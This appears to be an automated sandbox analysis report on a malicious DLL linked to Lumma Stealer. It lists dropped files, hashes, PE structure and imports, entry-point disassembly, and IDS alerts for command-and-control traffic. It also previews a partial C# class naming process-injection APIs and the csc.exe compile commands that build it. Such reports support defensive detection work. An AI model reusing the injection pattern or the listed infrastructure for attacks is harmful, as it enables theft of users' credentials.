                                                                                              Preview:L....5og.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP.................~.Y{*Q...{..z>..........4.......C:\Users\user\AppData\Local\Temp\RESF463.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.y.j.3.5.v.5.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.093040645438358
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTBYGak7YnqqIBYXPN5Dlq5J:+RI+ycuZhNAGakSRXPNnqX
                                                                                              MD5:F5CA51FC9523508B1EF469FACB273447
                                                                                              SHA1:2664BB6F79870A37482C80C6D58AB641D65E8A70
                                                                                              SHA-256:894ACEFADFD22D49A2FFD39D398EE1BFD62BD77B9DDD0E306139A507D76A63DC
                                                                                              SHA-512:C5262E179DB92ABDA841FC9077EC1717AE4AD851BCFD42200E63B2FC6E037BCE7E15B20C39F996A5EE87320AB8D58304B18443FE451CE58C2E40BF843412A962
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.z.l.e.s.m.v.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.z.l.e.s.m.v.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:false
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):4.981572627372863
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fskcRxzxszIwkn23fskcRa9n:p37L/6KRfqLQfqmn
                                                                                              MD5:4502961F20A8F56646955494FA14B9AF
                                                                                              SHA1:DF394000003DD37C78868284BA45493DC127FBF0
                                                                                              SHA-256:56213DE7FAFB2C10283CB3EF373FAFF9A0E4B0620B46D4B8F427FB29865D9C47
                                                                                              SHA-512:637533032C9620223C11738D6E8BA27F1BBC0EB6AFC22548039EF7969036582E6D0B3F0F73DCAEA35CD3E5B26425AF3F06B26074BF47010196228C26AA4617AD
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.627872387962876
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:GRH6HN4QhfNQ8q8888yYAdcRjOaYcUxRa95MqBY8eN45f:RNxNc9Oc+a95MqqS5f
                                                                                              MD5:ACE8EF044737FCF97039852D733F5AE3
                                                                                              SHA1:213D250E2B344119C40D62611DFF833C37902A39
                                                                                              SHA-256:82AD91F503399083E2C308F6FF38A236D905FBB4BC5020DE03BDC8FBD2D28757
                                                                                              SHA-512:E12F101A5BB30896EE5E7AD22ABC63D4D17DC4B8A677B38829AA79A1F30161E15584555E695482B18EF48BDFA1254A540885182025946294F6D64CCBFB350F24
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.218250753632092
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRfqLQfqmuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfNfOKax5DqBVKVrdFAMBJTH
                                                                                              MD5:A7819E3DDC559A0431EECB20908A17A8
                                                                                              SHA1:B1CAF3808FAF629198315EE9CEF0924C709A0F13
                                                                                              SHA-256:532613AFE6906545190F32CB2FD52BB3DA3B34C9FA276A43AF122335FD58B417
                                                                                              SHA-512:7B06C6326F23F8B613AC27886F10E21C3BE1E4FD8A2F4ED439C6AD943913643F4B9E904CA53D213113912A056395CD18B5F729D668E1D6306E3A2D022103DBCE
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.121861019873163
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+6ak7Ynqq1LPN5Dlq5J:+RI+ycuZhNXakSJPNnqX
                                                                                              MD5:21A83360B4C67E2B7FFD9951F6A04ABE
                                                                                              SHA1:025455979FBC91A46C05FD812AC6160157E8F64E
                                                                                              SHA-256:9B6AB46FAE3D09313519765389C6E19D2F81F92E6513254F4E491DD9DD73524C
                                                                                              SHA-512:5CD47F0250834559201174AAA31AC718D9DEE38B251CBE2FB637F3DEB9D5469F5DBEA23525A05AD3C20455DA4D478F857189E705C67E3BEFD4397C0AB3D056D1
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.q.5.a.k.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.y.q.5.a.k.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:false
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):5.085985031413143
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fpMZzxszIwkn23fpMEn:p37L/6KRfRMZQfRME
                                                                                              MD5:2B57CC6CE02A0FE003D45C6F57D9A7DA
                                                                                              SHA1:B66012F5613C999F2B2FDC0CF7852CA5F8CBC1C8
                                                                                              SHA-256:F4631C5FB45E114AD547653BACE82F40F123CDE9601BB1B26147312BA6F726E9
                                                                                              SHA-512:5125B8CDF158B897FC4D3895AF87F50C86E005AA57B5472EF97D18029627BD416887D126392A4FBE40749EBF71A10B72BA6EF37444363E2F66456D64CDA8FF16
                                                                                              Malicious:true
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.63185595537278
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:GRH6HN4QhfNQ8q8888yYAdYRjOavUxRa95MqBYTeN45H:RNxNY9OA+a95MqvS5H
                                                                                              MD5:3B544DD59F291106A62C5CA101E23D7B
                                                                                              SHA1:0AB3C4D9880F5A986BBBE81C249725AD8C2C237C
                                                                                              SHA-256:8DF2F1DD4D1E0F478D9CCF9A68382ECB0EAE49FF266636D8AABBB05231BAC6BB
                                                                                              SHA-512:59473DC8EE71614D2D16691E5D4DEAFA78722167F614EE18ADCBAF043B87582C2677A0983892F2D7E849DC48EB071090D326EC1709337BE91F338B7B165679A4
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.278197588577375
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRfRMZQfRMRKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfFf2Kax5DqBVKVrdFAMBJTH
                                                                                              MD5:3A53923E12A627E26752D5DC61D86A01
                                                                                              SHA1:DB1FF4322408C5E08B3C4D607B6183FD3AD72EEE
                                                                                              SHA-256:DA180690D5070D1B0D30F115E2465C006A82BC81BDC81DF36929080A4B8C0098
                                                                                              SHA-512:83721FD3205675604CD923A33D0D08108CB0D78DDB9B66078A66767753D5D59B42BA513D5FD69D580C8D689BB6FBE57E13C4DCA41F421BAFEA6C63DF8F3C8EC4
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.357910407078851
                                                                                              TrID:
                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:iviewers.dll
                                                                                              File size:93'184 bytes
                                                                                              MD5:690a4c9693ad790d6ee23492fe8bf869
                                                                                              SHA1:da39c94f65a34f2f2a72c6b2799f7d991a8c38d8
                                                                                              SHA256:320db923b7c701a6005e465a082ad48c2f3c8f36145ece15b4980a44202383fe
                                                                                              SHA512:17b3d9986e3e361f53ab69c35ab90412b93d2a53e1b5d0bd86bec7fb44af45d67f8c47acf03091285d2bed3952b5b72e986e949dbad9b130cad90bafd5671833
                                                                                              SSDEEP:1536:riUKaJeTUBp7KGhioxKLpBbIrta1Z9PvoNkM/6Mox/j1k+sWlzMcdbvcUCZ2M:rioJ9MGQoIHbvZ93oNkXjuQzNbvcUCZ2
                                                                                              TLSH:16935A11B5D1C071E6BF193E08649AB48B3FB810DF61ADEB279416AE4F302C1DE35D6A
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..L...L...L....h..G....h.......h..X....h..O...L........e..\....e..X....e..n....e..M....e..M....e..M...RichL..................
                                                                                              Icon Hash:7ae282899bbab082
                                                                                              Entrypoint:0x1000206a
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x10000000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                              Time Stamp:0x676B4EEE [Wed Dec 25 00:16:46 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:3be2261fa076757c8bb359470b1d32fd
                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                              jne 00007FF89C8285D7h
                                                                                              call 00007FF89C828798h
                                                                                              push dword ptr [ebp+10h]
                                                                                              push dword ptr [ebp+0Ch]
                                                                                              push dword ptr [ebp+08h]
                                                                                              call 00007FF89C828483h
                                                                                              add esp, 0Ch
                                                                                              pop ebp
                                                                                              retn 000Ch
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 0Ch
                                                                                              lea ecx, dword ptr [ebp-0Ch]
                                                                                              call 00007FF89C8280F5h
                                                                                              push 10015694h
                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                              push eax
                                                                                              call 00007FF89C82948Eh
                                                                                              int3
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 0Ch
                                                                                              lea ecx, dword ptr [ebp-0Ch]
                                                                                              call 00007FF89C82799Dh
                                                                                              push 10015620h
                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                              push eax
                                                                                              call 00007FF89C829471h
                                                                                              int3
                                                                                              jmp 00007FF89C82BAB6h
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push 00000000h
                                                                                              call dword ptr [10010004h]
                                                                                              push dword ptr [ebp+08h]
                                                                                              call dword ptr [10010000h]
                                                                                              push C0000409h
                                                                                              call dword ptr [10010008h]
                                                                                              push eax
                                                                                              call dword ptr [1001000Ch]
                                                                                              pop ebp
                                                                                              ret
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000324h
                                                                                              push 00000017h
                                                                                              call dword ptr [10010010h]
                                                                                              test eax, eax
                                                                                              je 00007FF89C8285D7h
                                                                                              push 00000002h
                                                                                              pop ecx
                                                                                              int 29h
                                                                                              mov dword ptr [10017A50h], eax
                                                                                              mov dword ptr [10017A4Ch], ecx
                                                                                              mov dword ptr [10017A48h], edx
                                                                                              mov dword ptr [10017A44h], ebx
                                                                                              mov dword ptr [10017A40h], esi
                                                                                              mov dword ptr [10017A3Ch], edi
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x15ce0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15d30 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x19000 | 0xfdc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x14f3c | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x14f58 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe9ae | 0xea00 | 6b6083b0a808e39361dec305fd766524 | False | 0.603248530982906 | data | 6.56645402014901 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000 | 0x63be | 0x6400 | 33504ca0b477cfca5e9bae28b9295a2d | False | 0.4229296875 | zlib compressed data | 4.935023894243395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0x1378 | 0xa00 | 940950c6b85fb08d5f90d2d612f17f8c | False | 0.16953125 | data | 2.396097838960016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x19000 | 0xfdc | 0x1000 | c3938240bf6031ca233ad2a21bc5c3d2 | False | 0.777099609375 | data | 6.484463515997174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, RaiseException, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, CompareStringW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, DecodePointer
Name | Ordinal | Address
DllRegisterServer | 1 | 0x10001000
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T22:32:58.287929+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
2024-12-27T22:32:58.346022+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | TCP
2024-12-27T22:32:58.367886+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49730 | 149.154.167.220 | 443 | TCP
2024-12-27T22:33:00.345165+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49733 | 149.154.167.220 | 443 | TCP
2024-12-27T22:33:10.318916+0100 | 2800029 | ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass | 1 | 147.45.44.131 | 80 | 192.168.2.4 | 49741 | TCP
2024-12-27T22:33:13.149207+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:13.151135+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:13.174962+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49747 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:13.917198+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49745 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:13.917198+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:14.145093+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49746 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:14.145093+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49746 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:14.156465+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49747 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:14.156465+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49747 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:15.295801+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:15.632826+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:15.637538+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:15.736647+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:16.406176+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49750 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:16.406176+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:16.410276+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49751 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:16.410276+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49751 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:16.504808+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49752 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:16.504808+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49752 | 104.21.60.24 | 443 | TCP
2024-12-27T22:33:17.800514+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.60.24 | 443 | TCP
